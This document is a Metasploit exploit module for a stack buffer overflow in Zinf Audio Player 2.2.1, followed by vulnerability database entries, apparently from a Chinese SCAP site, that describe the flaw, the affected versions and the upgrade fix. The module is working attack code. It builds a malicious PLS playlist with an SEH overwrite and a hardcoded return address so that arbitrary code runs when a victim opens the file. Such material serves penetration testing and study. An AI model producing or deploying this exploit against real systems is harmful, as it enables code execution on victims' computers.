class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zinf Audio Player 2.2.1 (PLS File) Stack Overflow.',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
					An attacker must send the file to victim and the victim must open the file.
					Alternatively it may be possible to execute code remotely via an embedded
					PLS file within a browser, when the PLS extention is registered to Zinf.
					This functionality has not been tested in this module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'patrick' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0964' ],
					[ 'OSVDB', '10416' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
					[ 'BID', '11248' ],
				],
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					# Tested by patrick - 20090429 xpsp3
					[ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui
				],
			'Privileged'     => false,
			'DisclosureDate' => '24 Sep 2004',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The file name.',  'exploit_zinf.pls']),
				], self.class)

	end

	def exploit
		seh = generate_seh_payload(target.ret)
		filepls = rand_text_alpha_upper(1424) + seh

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(filepls)

	end

end

    

- 漏洞信息

10416
Zinf Playlist Manager .pls File Overflow
Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A buffer overflow exists in Zinf 2.2.1 and below. The Zinf player fails to check buffer lengths resulting in a stack overflow. With a specially crafted playlist file, a context-dependent attacker can execute arbitrary code.

- 时间线

2004-09-25 Unknow
2004-09-24 Unknow

- 解决方案

Upgrade to version 2.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Zinf Malformed Playlist File Remote Buffer Overflow Vulnerability
Boundary Condition Error 11248
Yes No
2004-09-24 12:00:00 2009-01-30 07:59:00
Discovery is credited to Luigi Auriemma <aluigi@autistici.org>.

- 受影响的程序版本

Zinf Zinf 2.2.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha

- 漏洞讨论

Zinf is prone to a remote buffer-overflow vulnerability when processing malformed playlist files. This issue occurs because the application fails to perform sufficient boundary checks. An attacker may exploit this issue to gain unauthorized access to a vulnerable computer.

Zinf 2.2.1 for Windows is vulnerable.

NOTE: Zinf 2.2.5 for Linux is reportedly fixed, but this has not been confirmed.

- 漏洞利用

The following exploits are available:

- 解决方案

Fixes are available. Please see the references for details.


Debian Linux 3.0 hppa

Debian Linux 3.0 ppc

Debian Linux 3.0 s/390

Debian Linux 3.0 arm

Debian Linux 3.0 alpha

Debian Linux 3.0 mips

Debian Linux 3.0 mipsel

Debian Linux 3.0 ia-32

Debian Linux 3.0 sparc

Debian Linux 3.0 m68k

Debian Linux 3.0 ia-64

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站